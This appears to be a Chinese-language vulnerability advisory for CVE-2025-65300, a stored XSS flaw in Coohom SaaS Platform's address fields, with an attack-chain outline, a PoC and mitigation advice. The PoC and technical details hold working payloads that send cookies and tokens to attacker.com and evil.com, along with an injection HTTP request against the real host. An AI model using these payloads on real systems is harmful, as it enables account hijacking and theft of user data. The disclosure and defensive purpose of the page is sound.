CVE-2025-65300 Coohom SaaS Platform存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65300

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Coohom SaaS Platform

漏洞概述

CVE-2025-65300是Coohom SaaS Platform（版本feVersion=1760060603897，发布日期2025-10-28）中发现的存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于账户设置模块的地址字段中，具体包括城市（City）、州/省（State）和国家/地区（Country/Region）三个输入字段。由于系统未对这些用户输入进行充分的输入验证和输出编码，攻击者可以在地址字段中注入恶意的JavaScript代码。当受害者访问其个人资料页面时，注入的恶意脚本将被执行，可能导致会话劫持、Cookie窃取、敏感信息泄露或进一步的网络钓鱼攻击。此漏洞需要低权限用户即可实施，且需诱导受害者访问相关页面才能触发，成功利用可对用户数据安全和企业声誉造成严重影响。

技术细节

该漏洞为典型的存储型XSS（Stored Cross-Site Scripting）漏洞，攻击原理如下：1）攻击者首先以低权限用户身份登录Coohom SaaS Platform；2）导航至账户设置页面（/pub/saas/settings/account）；3）在地址字段（City、State或Country/Region）中注入恶意JavaScript代码，如：<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>；4）系统未对输入进行HTML实体编码或输入验证，直接将数据存储至数据库；5）当其他用户或同一用户访问个人资料页面时，服务器从数据库读取未经过滤的数据并嵌入到HTML响应中；6）受害者浏览器将恶意代码作为合法脚本执行。由于该脚本存储在服务器端，所有访问该页面的用户都会受到攻击，形成持久性攻击链。攻击者可利用此漏洞窃取用户会话Cookie、劫持账户或植入恶意重定向。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标系统为Coohom SaaS Platform，确认账户设置模块存在地址输入字段

STEP 2

Initial Access

攻击者注册低权限账户或利用已有低权限账户登录系统

STEP 3

Payload Injection

在账户设置的地址字段（City/State/Country）中注入恶意JavaScript代码，如<script>标签或事件处理器

STEP 4

Persistence

恶意载荷被存储在服务器数据库中，由于缺乏输入过滤，代码被永久保存

STEP 5

Trigger

受害者（管理员或其他用户）访问攻击者个人资料页面或相关页面

STEP 6

Execution

受害者浏览器解析HTML时执行注入的恶意脚本

STEP 7

Impact

攻击者成功窃取Cookie/会话令牌、劫持账户、执行钓鱼攻击或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-65300 PoC - Stored XSS in Coohom SaaS Platform
// Target: Account Settings -> Address Fields (City, State, Country/Region)

// Step 1: Login to Coohom SaaS Platform with low-privilege account
// Navigate to Account Settings page

// Step 2: Inject XSS payload in City field
const xssPayloadCity = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';
// Or use shorter payload
const xssPayloadAlt = '<img src=x onerror="fetch('https://attacker.com/steal?data='+btoa(document.cookie))">';

// Step 3: Similar payloads for State and Country/Region fields
// City: <script>alert(document.domain)</script>
// State: <img src=x onerror=document.location='https://evil.com/?c='+document.cookie>
// Country/Region: <svg/onload=fetch('https://attacker.com/'+localStorage.getItem('token'))>

// Step 4: Save the settings - payload is stored on server
// Step 5: When any user views the profile, XSS executes

// Example HTTP Request:
/*
POST /api/user/profile HTTP/1.1
Host: www.coohom.com
Content-Type: application/json

{
  "address": {
    "city": "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>",
    "state": "TestState",
    "country": "China"
  }
}
*/

影响范围

Coohom SaaS Platform feVersion=1760060603897 (2025-10-28)

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时措施：1）禁用账户设置中的地址字段编辑功能；2）对所有用户输入实施严格的输入过滤规则，拦截<、>、'、"、script等关键字；3）启用Web应用防火墙的XSS防护规则；4）监控异常的用户输入模式；5）对管理员和敏感用户账户启用双因素认证；6）限制低权限用户访问个人资料页面的某些功能模块。